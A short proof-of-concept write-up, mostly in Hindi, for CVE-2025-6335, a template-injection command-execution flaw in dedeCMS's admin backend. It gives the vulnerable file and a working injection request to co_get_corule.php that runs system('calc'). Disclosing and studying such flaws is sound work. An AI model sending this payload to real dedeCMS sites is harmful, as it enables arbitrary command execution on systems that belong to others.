
CVE-2025-6335 dedeCMS 5.7 sp2 में टेम्पलेट इंजेक्शन कमांड निष्पादन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो बैकग्राउंड इंटरफेस के माध्यम से मनमाना कमांड निष्पादन सक्षम करता है।
BUG_Author: Ewoji
Affected Version: dedeCMS < 5.7.2
Vendor: Shanghai Zhuozhuo Network Technology Co., LTD
Software: dedeCMS
Vulnerability Files:
/include/dedetag.class.phpस्थापना के पश्चात, पृष्ठभूमि में लॉग इन करें
टेम्पलेट का शोषण
शोषण का सत्यापन:
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
इस प्रकार दो बार एक्सेस करने से कमांड निष्पादित किया जा सकता है